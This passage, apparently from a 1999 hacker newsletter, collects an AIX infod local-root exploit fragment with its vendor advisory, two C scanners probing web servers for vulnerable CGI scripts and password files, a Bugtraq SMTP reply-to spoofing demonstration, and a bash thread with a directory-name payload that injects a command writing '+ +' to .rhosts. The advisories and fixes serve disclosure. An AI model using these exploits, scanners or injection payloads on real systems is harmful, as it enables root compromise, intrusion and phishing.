/* LANG (1 C 0 0 0 0 0 0 0) */
sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
fwrite(buffer,1,9,param);
/* size_$HOME $HOME 0 0 0 */
send_environ(HOME,param);
/* size_$LOGNAME $LOGNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$USERNAME $USERNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$PWD $PWD 0 0 0 */
send_environ(PWD,param);
/* size_DISPLAY DISPLAY 0 0 0 */
//send_environ(ptsname(0),param);
/* If we send our pts, info_gr will crash as it has already changed UID */
send_environ("/dev/null",param);
/* It's probably not useful to copy all these environment vars but it was
good for debugging :) */
sprintf(buffer,"%c%c%c%c",23,0,0,0);
fwrite(buffer,1,4,param);
sprintf(buffer,"_=./startinfo");
send_environ(buffer,param);
sprintf(buffer,"TMPDIR=/tmp");
send_environ(buffer,param);
sprintf(buffer,"LANG=%s",getenv("LANG"));
send_environ(buffer,param);
sprintf(buffer,"LOGIN=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
send_environ(buffer,param);
sprintf(buffer,"PATH=%s",getenv("PATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","EDITOR=emacs");
send_environ(buffer,param);
sprintf(buffer,"LOGNAME=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
send_environ(buffer,param);
sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","PS1=(exploited !) ");
send_environ(buffer,param);
sprintf(buffer,"USER=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
send_environ(buffer,param);
sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
send_environ(buffer,param);
sprintf(buffer,"SHELL=%s",getenv("SHELL"));
send_environ(buffer,param);
sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
send_environ(buffer,param);
sprintf(buffer,"HOME=%s",HOME);
send_environ(buffer,param);
sprintf(buffer,"%s","TERM=vt220");
send_environ(buffer,param);
sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
send_environ(buffer,param);
sprintf(buffer,"PWD=%s",PWD);
send_environ(buffer,param);
sprintf(buffer,"%s","TZ=NFT-1");
send_environ(buffer,param);
sprintf(buffer,"%s","A__z=! LOGNAME");
send_environ(buffer,param);
/* Start info_gr with -q parameter or the process will be run locally and
not from the daemon ... */
sprintf(buffer,"%c%c%c%c",1,45,113,0);
fwrite(buffer,1,4,param);
fclose(param);
param=fopen("/tmp/tempo.fun","rb");
fseek(param,0,SEEK_END);
taille_param=ftell(param);
fseek(param,0,SEEK_SET);
fread(paramz,1,taille_param,param);
fclose(param);
unlink("/tmp/tempo.fun");
/* Thank you Mr daemon :) */
write(chaussette,paramz,taille_param);
printf("\n%s %s\n",OK,getenv("HOSTNAME"));
close(chaussette);
}
-------------------------------------------------------------------------
RSI.0011.11-12-98.AIX.INFOD
|:::. |::::: |::::. |::::: |::::: |::::.
.. :: .. .. :: .. .. .. ::
|:::: |:::: |:::: :::::: |::::: |:::: |:
|: :: |: |: |:: |: |: ::
|: :: |::::: |: |::::: |::::: |:::::
Repent Security Incorporated, RSI
[ http://www.repsec.com ]
*** RSI ALERT ADVISORY ***
--- [CREDIT] --------------------------------------------------------------
Andrew Green: Discovered the vulnerability
Mark Zielinski: Author of the advisory
--- [SUMMARY] -------------------------------------------------------------
Announced: November 09, 1998
Report code: RSI.0011.11-12-98.AIX.INFOD
Report title: AIX infod
Vulnerability: Please see the details section
Vendor status: AIX contacted on November 12, 1998
Patch status: IBM is currently working on several fixes
Platforms: AIX 3.2.x, 4.1.x, 4.2.x, 4.3.x
Reference: http://www.repsec.com/advisories.html
Impact: If exploited, an attacker could potentially compromise
root access locally on your server
--- [DETAILS] -------------------------------------------------------------
Description: The Info Explorer daemon is a AIX utility which is used
to provide documentation for the operating system and
associated programs.
Problem: The info daemon does not perform any validation on information
passed to the local socket that it is bound to. Users on the
system can send false information to the daemon and trick
it into spawning a connection to the intruders X display.
Details: By sending a UID and GID of 0, along with a false environment,
infod will be forced into spawning a connection with root
privileges to the intruder's X display.
Once the program appears on the screen, they can goto
the default options menu and change the printer command
line to an alternate binary such as /bin/sh that gives
privileges to the account the session was spawned under.
--- [FIX] -----------------------------------------------------------------
Solution: IBM is currently working on the following fixes which will be
available soon:
AIX 3.2.x: upgrade to version 4
AIX 4.1.x: IX84640
AIX 4.2.x: IX84641
AIX 4.3.x: IX84642
Until the fixes can be applied, the infod daemon should be disabled.
Run the following commands as root:
# stopsrc -s infod
# rmitab infod
# chown root.system /usr/lpp/info/bin/infod
# chmod 0 /usr/lpp/info/bin/infod
---------------------------------------------------------------------------
Repent Security Incorporated (RSI)
13610 N. Scottsdale Rd.
Suite #10-326
Scottsdale, AZ 85254
E-Mail: advise@repsec.com
FTP: ftp://ftp.repsec.com
WWW: http://www.repsec.com
---------------------------------------------------------------------------
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQCNAzU6dqAAAAEEAOHt9a5vevjD8ZjsEmncEbFp2U7aeqvPTcF/8FJMilgOVp75
dshXvZixHsYU7flgCNzA7wLIQPWBQBrweLG6dx9gE9e5Ca6yAJxZg8wNsi06tZfP
nvmvf6F/7xoWS5Ei4k3YKuzscxlyePNNKws6uUe2ZmwVoB+i3HHT44dOafMhAAUT
tBpSZXBTZWMgPGFkdmlzZUByZXBzZWMuY29tPg==
=ro8H
-----END PGP PUBLIC KEY BLOCK-----
Copyright November 1998 RepSec, Inc.
The information in this document is provided as a service to customers
of RepSec, Inc. Neither RepSec, Inc., nor any of it's employees, makes
any warranty, express or implied, or assumes any legal liability or
responsibility for the accuracy, completeness, or usefulness of any
information, apparatus, product, or process contained herein, or
represents that its use would not infringe any privately owned rights.
Reference herein to any specific commercial products, process, or
services by trade name, trademark, manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation or
favoring by RepSec, Inc. The views and opinions of authors express
herein do no necessarily state or reflect those of RepSec, Inc., and may
not be used for advertising or product endorsement purposes.
The material in this alert advisory may be reproduced and distributed,
without permission, in whole or in part, by other security incident
response teams (both commercial and non-commercial), provided the above
copyright is kept intact and due credit is given to RepSec, Inc.
This alert advisory may be reproduced and distributed, without
permission, in its entirety only, by any person provided such
reproduction and/or distribution is performed for non-commercial
purposes and with the intent of increasing the awareness of the Internet
community.
---------------------------------------------------------------------------
RepSec, Inc. are trademarks of RepSec, Inc. All other trademarks are
property of their respective holders.
@HWA
28.0 Cold Fusion vulnerability scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
COLD FUSION VULNERABILITY TESTER - Checks for the l0pht advisory
"Cold Fusion Application Server Advisory" dated 4.20.1999
you can find a copy of this advisory and all other
l0pht Security Advisories here:
http://www.l0pht.com/advisories.html
much of this program was blatently copied from the cgi scanner released about
a week ago, written by su1d sh3ll... I just want to give credit where credit
is due... this particular scanner was "written" (basically modified) by
hypoclear of lUSt - Linux Users Strike Today... I know that it is trivial to
check to see if a server is vulnerable, but I had fun doing this so who the
heck cares if I want to waste my time...
while I'm here I minds well give shout outs to:
Phrozen Phreak (fidonet rules)
Special K (you will never get rid of my start button ;-)
go powerpuff girls (he he) ;-)
compile: gcc -o coldscan coldscan.c
usage: coldscan host
tested on: IRIX Release 5.3 (this should compile on most *NIX systems though)
*/
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cfbuff[1024];
char *cfpage[5];
char *cfname[5];
cfpage[1] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
cfpage[2] = "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0\n\n";
cfpage[3] = "GET /cfdocs/expeval/exprcalc.cfm HTTP/1.0\n\n";
cfname[1] = "openfile.cfm ";
cfname[2] = "displayopenedfile.cfm ";
cfname[3] = "exprcalc.cfm ";
if (argc<2)
{
printf("\n-=COLD FUSION VULNERABILITY TESTER=-");
printf("\nusage - %s host \n",argv[0]);
exit(0);
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n-=COLD FUSION VULNERABILITY TESTER=-\n");
printf("scanning...\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
while(count++ < 3)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cfname[count]);
for(numin=0;numin < 1024;numin++)
{
cfbuff[numin] = '\0';
}
send(sock, cfpage[count],strlen(cfpage[count]),0);
recv(sock, cfbuff, sizeof(cfbuff),0);
cgistr = strstr(cfbuff,foundmsg);
if( cgistr != NULL)
printf("Exists!\n");
else
printf("Not Found\n");
close(sock);
}
}
@HWA
29.0 Updated CGI scanner scans for vulnerable servers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Cgi Scan v3.0 - scans for vunerabil webbased servers */
/* Based on Ech0's cgi scanner - i thought it was crap :( */
/* Modified and re-written by v0rt-fu (### - undernet) */
/* Most of these can be exploited via www.anonymiser.com */
/* phf isnt allow - others havent been tested by should */
/* work. */
/* Considering this scans a server for 43 vunerabilities */
/* only those exploits found are shown so you can track */
/* what is actually happening */
/* Thanks to b|ueberry for helping me pull through the */
/* the hard times and made me continue to code :) */
/* v0rt-fu */
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
void main(int argc, char *argv[])
{
int sock,debugm=0;
struct in_addr addr;
struct sockaddr_in sin;
struct hostent *he;
unsigned long start;
unsigned long end;
unsigned long counter;
char foundmsg[] = "200";
char *cgistr;
char buffer[1024];
int count=0;
int numin;
char cgibuff[1024];
char *buff[50];
char *cginame[50];
buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n";
buff[2] = "GET /cgi-bin/phf HTTP/1.0\n\n";
buff[3] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
buff[4] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
buff[5] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
buff[6] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
buff[7] = "GET /cgi-bin/handler HTTP/1.0\n\n";
buff[8] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
buff[9] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
buff[10] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
buff[11] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
buff[12] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
buff[13] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
buff[14] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
buff[15] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
buff[16] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
buff[17] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
buff[18] = "GET /cgi-bin/campas HTTP/1.0\n\n";
buff[19] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
buff[20] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
buff[21] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
buff[22] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
buff[23] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
buff[24] = "GET /cgi-bin/jj HTTP/1.0\n\n";
buff[25] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
buff[26] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
buff[27] = "GET /cgi-bin/finger HTTP/1.0\n\n";
buff[28] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
buff[29] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
buff[30] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
buff[31] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
buff[32] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
buff[33] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
buff[34] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
buff[35] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
buff[36] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
buff[37] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
buff[38] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
buff[39] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
buff[40] = "GET /search97.vts HTTP/1.0\n\n";
buff[41] = "GET /carbo.dll HTTP/1.0\n\n";
buff[42] = "GET /cgi-bin/fpexplore.exe HTTP/1.0\n\n";
buff[43] = "GET /cfdocs/expeval/openfile.cfm HTTP/1.0\n\n";
cginame[1] = "UnlG ";
cginame[2] = "phf ";
cginame[3] = "Count.cgi ";
cginame[4] = "test-cgi ";
cginame[5] = "nph-test-cgi ";
cginame[6] = "php.cgi ";
cginame[7] = "handler ";
cginame[8] = "webgais ";
cginame[9] = "websendmail ";
cginame[10] = "webdist.cgi ";
cginame[11] = "faxsurvey ";
cginame[12] = "htmlscript ";
cginame[13] = "pfdisplay ";
cginame[14] = "perl.exe ";
cginame[15] = "wwwboard.pl ";
cginame[16] = "www-sql ";
cginame[17] = "view-source ";
cginame[18] = "campas ";
cginame[19] = "aglimpse ";
cginame[20] = "man.sh ";
cginame[21] = "AT-admin.cgi ";
cginame[22] = "filemail.pl ";
cginame[23] = "maillist.pl ";
cginame[24] = "jj ";
cginame[25] = "info2www ";
cginame[26] = "files.pl ";
cginame[27] = "finger ";
cginame[28] = "bnbform.cgi ";
cginame[29] = "survey.cgi ";
cginame[30] = "AnyForm2 ";
cginame[31] = "textcounter.pl ";
cginame[32] = "classifields.cgi ";
cginame[33] = "environ.cgi ";
cginame[34] = "service.pwd ";
cginame[35] = "users.pwd ";
cginame[36] = "authors.pwd ";
cginame[37] = "administrators.pwd ";
cginame[38] = "args.bat ";
cginame[39] = "uploader.exe ";
cginame[40] = "search97.vts ";
cginame[41] = "carbo.dll ";
cginame[42] = "fpexplore.exe ";
cginame[43] = "openfile.cfm ";
if (argc<2)
{
printf("\n _ _ __ ___ _ _ _ _ __ ___ _ _ _ _ __ ___ _ _ ");
printf("\n( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( )");
printf("\n ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ");
printf("\n(_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_)");
printf("\n Presents");
printf("\n [ Cgi Scanner ]");
printf("\n v3.0");
printf("\n ### - undernet.org ");
printf("\n");
printf("\nUsage: ./cgi www.server.com\n");
printf("\n");
exit(0);
}
if (argc>2)
{
if(strstr("-d",argv[2]))
{
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n _ _ __ ___ _ _ _ _ __ ___ _ _ _ _ __ ___ _ _ ");
printf("\n( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( ) ( )_( )/. | / __)( )_( )");
printf("\n ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ) _ ((_ _)`__ ` ) _ ( ");
printf("\n(_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_) (_) (_) (_) (___/(_) (_)");
printf("\n Presents");
printf("\n [ Cgi Scanner ]");
printf("\n v3.0");
printf("\n ### - undernet.org ");
printf("\n");
printf("\nCgi Scan v3.0");
printf("\n\nPress any key to continue\n\n");
getchar();
printf("\nReceiving Httpd Version\n\n");
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\nReceiving Cgi Details\n\n");
while(count++ < 43)
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL) {
printf("%s :",cginame[count]);
printf(" Found\n");
}
}
printf("\nScan Complete\n\n");
printf("\nv0rt-fu -- ### undernet.org\n\n");
}
@HWA
30.0 MS Outlook, spoof yer reply-to address?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 20 Apr 1999 15:10:05 -0700
From: Nate Lawson <nate@root.org>
To: BUGTRAQ@netspace.org
Subject: Outlook 98 allows spoofing internal users
Problem: Outlook uses a sender's Reply-To address silently, allowing
a user to inadvertently send data to an Internet mail account
when intending to reply to an internal, trusted user.
Impact: Anyone on the Internet can spoof a trusted internal Exchange user
and get replies sent back to themself without the user knowing they
weren't responding to another internal user.
How to reproduce:
1. Spoof mail as an internal user with a Reply-To address claiming to be
an internal user, but an address of an Internet account, say hotmail.
2. Go into Outlook and read the mail. The mail looks like it was internally
generated but viewing the full Internet headers under View->Options
shows the bogus Reply-To header.
3. Hit Reply in Outlook. The To: field looks like it's going to a valid
internal user, but right clicking on it and choosing Properties shows
that the internal user it is sending the reply to is actually an Internet
address.
4. Enter some text and hit Send. Observe that the mail went to the attacker's
account, not the internal one.
A quick script:
{root 5:00pm} ~> telnet mail.example.com 25
Trying 10.20.2.5...
Connected to mail.example.com.
Escape character is '^]'.
220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
helo losebag
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<accounting@example.com>
250 OK - Recipient <accounting@example.com>
data
354 Send data. End with CRLF.CRLF
>From: Nate Lawson
To: Accounting
Reply To: Nate Lawson<intruder@hotmail.com>
Subject: important!
Please reply with the latest copy of our sales figures!
Thanks,
Nate
.
250 OK
quit
221 closing connection
Connection closed by foreign host.
Now, a reply to the email will go not to the trusted internal user Nate
Lawson <nlawson@example.com> but to the attacker, <intruder@hotmail.com>.
Worse, the user sees no indication that the mail is outward-bound! The
To: field on the reply simply shows "Nate Lawson", a valid internal user.
Affected programs: Only tested on Outlook 98
Known use of this bug to get confidential information: none yet
Suggested Fix: always show the full email address of any recipient that is
not local (i.e. username@example.com would be hidden but any instance of
user@hotmail.com would be shown)
Microsoft has been notified, but claimed this was a weakness in SMTP and
would not be fixed until a secure successor to SMTP is implemented. They
obviouly missed the point -- the error is not in that mail can be forged,
but that Outlook allows a user to respond to a message that looks local
and legitimate, but is actually destined for an outside address.
-Nate
-----------------------------------------------------------------------
Date: Sun, 25 Apr 1999 18:36:11 +0200
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@netspace.org
Subject: Re: Outlook 98 allows spoofing internal users
On Tue, Apr 20, 1999 at 03:10:05PM -0700, Nate Lawson wrote:
>
> Suggested Fix: always show the full email address of any recipient that is
> not local (i.e. username@example.com would be hidden but any instance of
> user@hotmail.com would be shown)
Yeah, like: I am user@aol.com and I'd like outlook to hide evilhacker@aol.com.
Outlook should not be hiding anything..
Greetz, Peter
--
| 'He broke my heart, | Peter van Dijk |
I broke his neck' | peter@attic.vuurwerk.nl |
nognixz - As the sun | Hardbeat@ircnet - #cistron/#linux.nl |
| Hardbeat@undernet - #groningen/#kinkfm/#vdh |
@HWA
31.0 Bash parsing vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 20 Apr 1999 21:25:47 -0400
From: Shadow <shadow@OPERATOR.ORG>
To: BUGTRAQ@netspace.org
Subject: Bash Bug
Figured while everyone was working with bash, I might as well make this
one public(I apologize if this is old news, apparently it hasnt been fixed
if so).
If a user creates a directory with a command like
mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
and someone cd's into said directory, either by accident, or whatever,
then it will cause it to actually execute. I also did this with a passwd
file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to
the rhosts. Played with symlinks and a few other ways to see if perhaps
maybe the system could trip it if a user made the directory in say /tmp.
Granted it may be a long shot on the users part, the ability to do so is a
bad thing IMHO. This didnt seem to work on any of my BSD boxes.
shadow - CLE
-------------------------------------------------------------------------
Most Failure is due to giving up, not realizing how close to success you
were - Thomas Edison
-------------------------------------------------------------------------
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 13:10:52 +0200
From: Henrik Nordstrom <hno@HEM.PASSAGEN.SE>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
Parts/Attachments:
1 Shown 21 lines Text
2 Shown 20 lines Text
----------------------------------------
Shadow wrote:
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
>
> and someone cd's into said directory, either by accident, or whatever,
> then it will cause it to actually execute.
It is a vulnerability of the prompt parsing, or more specifically the \w
or \W prompt escapes for showing the current directory. These get parsed
before backquote parsing of the prompt string.
Workaround: Make sure the variable PS1 is set to something not including
the above escapes when cd'ing into directories with backquotes or $ as
part of their name.
Patch for bash-1.14.7 attached.
bug-bash@prep.ai.mit.edu has been notified.
--
Henrik Nordstrom
[ Part 2: "Attached Text" ]
--- parse.y.orig Thu Apr 22 11:53:01 1999
+++ parse.y Thu Apr 22 12:56:34 1999
@@ -2729,6 +2729,17 @@
#else
getwd (t_string);
#endif /* EFFICIENT */
+ if (strcspn(t_string, slashify_in_quotes) < strlen(t_string)) {
+ char t_string2[MAXPATHLEN];
+ int i, j;
+ for (i = 0, j = 0 ; t_string[i] && j < MAXPATHLEN - 2 ; i++) {
+ if (member(t_string[i], slashify_in_quotes))
+ t_string2[j++] = '\\';
+ t_string2[j++] = t_string[i];
+ }
+ t_string2[j] = '\0';
+ strcpy(t_string, t_string2);
+ }
if (c == 'W')
{
----------------------------------------------------------------------------
Date: Wed, 21 Apr 1999 20:39:48 EDT
From: Andy Church <achurch@DRAGONFIRE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
>Figured while everyone was working with bash, I might as well make this
>one public(I apologize if this is old news, apparently it hasnt been fixed
>if so).
>
>If a user creates a directory with a command like
>
>mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
>
>and someone cd's into said directory, either by accident, or whatever,
>then it will cause it to actually execute.
Just to clarify, this only happens if PS1 (the bash prompt) contains
\w or \W _and_ a prompt is displayed containing the bogus directory name.
This means unattended shell scripts are safe. As a workaround, use `pwd`
in place of \w.
Tested with bash 1.14 (it's the only one I have handy).
--Andy Church
achurch@dragonfire.net
http://achurch.dragonfire.net/
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 03:18:48 +0200
From: Marc Lehmann <pcg@GOOF.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
On Tue, Apr 20, 1999 at 09:25:47PM -0400, Shadow wrote:
>
> If a user creates a directory with a command like
>
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
It seems to me that this is related to the prompt string parsing. If yes,
then bash is not vulnerable unless configured to display the current
directory (correct me if the root of the problem is different).
Some additional notes:
- I was unable to reproduce this on my system, even when bash is configured
to display the current path in the prompt. (bash 2.02.1(1))
- The original example seemed to have too much whitespace. I used:
mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\`"
- PS1 was set to \h:\w\$
HTH
--
-----==- |
----==-- _ |
---==---(_)__ __ ____ __ Marc Lehmann +--
--==---/ / _ \/ // /\ \/ / pcg@goof.com |e|
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE --+
The choice of a GNU generation |
|
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 11:16:06 +0200
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
On Tue, 20 Apr 1999, Shadow wrote:
> mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
Bash 1.x screws up during PS1 substitution (\w, \W). Bash 2.x does not
seem to be vulnerable. Anyway, there's a hope even for those who want to
stick to 1.x: replace \w with $PWD, \W with ${PWD##*/} (no guarantee).
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"NSA GCHQ KGB CIA nuclear conspiration war weapon spy agent... Hi Echelon!"
----------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 00:02:57 +0300
From: Guy Cohen <guy@SPICE.ORG.IL>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote:
.| >If a user creates a directory with a command like
.| >
.| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
.| >
.| Just to clarify, this only happens if PS1 (the bash prompt) contains
.| \w or \W _and_ a prompt is displayed containing the bogus directory name.
.| This means unattended shell scripts are safe. As a workaround, use `pwd`
.| in place of \w.
.|
Unfortunately this is not true. here is why:
rush:/tmp> bash --version
GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
Copyright 1998 Free Software Foundation, Inc.
rush:/tmp> bash
bash-2.03$ echo $PS1
\s-\v\$
bash-2.03$ cat ~/.rhosts
cat: /export/home/guy/.rhosts: No such file or directory
bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
bash-2.03$ cd \\\ \ /
bash-2.03$ cat /export/home/guy/.rhosts\
+ +
sh-2.03$
--
Guy Cohen <guy@spice.org.il>
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 17:43:24 -0400
From: Daniel Jacobowitz <drow@FALSE.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
On Fri, Apr 23, 1999 at 12:02:57AM +0300, Guy Cohen wrote:
> Unfortunately this is not true. here is why:
> rush:/tmp> bash --version
> GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
> Copyright 1998 Free Software Foundation, Inc.
> rush:/tmp> bash
> bash-2.03$ echo $PS1
> \s-\v\$
> bash-2.03$ cat ~/.rhosts
> cat: /export/home/guy/.rhosts: No such file or directory
> bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
> bash-2.03$ cd \\\ \ /
> bash-2.03$ cat /export/home/guy/.rhosts\
> + +
> sh-2.03$
That's a quoting error. Look at the mkdir command you typed, and
observe that the backticks are not escaped - thus even inside of ""
they are evaluated.
Witness:
$ ls /drow/.rh*
ls: /drow/.rh*: No such file or directory
$ echo $PS1
\$
$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
$ ls /drow/.rhosts\
/drow/.rhosts
It doesn't even get .rhosts right - there's a space at the end. You
told bash to make the directory:
`echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ `
Dan
/--------------------------------\ /--------------------------------\
| Daniel Jacobowitz |__| CMU, CS class of 2002 |
| Debian GNU/Linux Developer __ Part-Time Systems Programmer |
| dan@debian.org | | drow@cs.cmu.edu |
\--------------------------------/ \--------------------------------/
----------------------------------------------------------------------------
Date: Thu, 22 Apr 1999 15:44:35 -0400
From: Chet Ramey <chet@NIKE.INS.CWRU.EDU>
Reply-To: chet@po.CWRU.Edu
To: BUGTRAQ@netspace.org
Subject: Re: Bash Bug
> On Tue, 20 Apr 1999, Shadow wrote:
>
> > mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
>
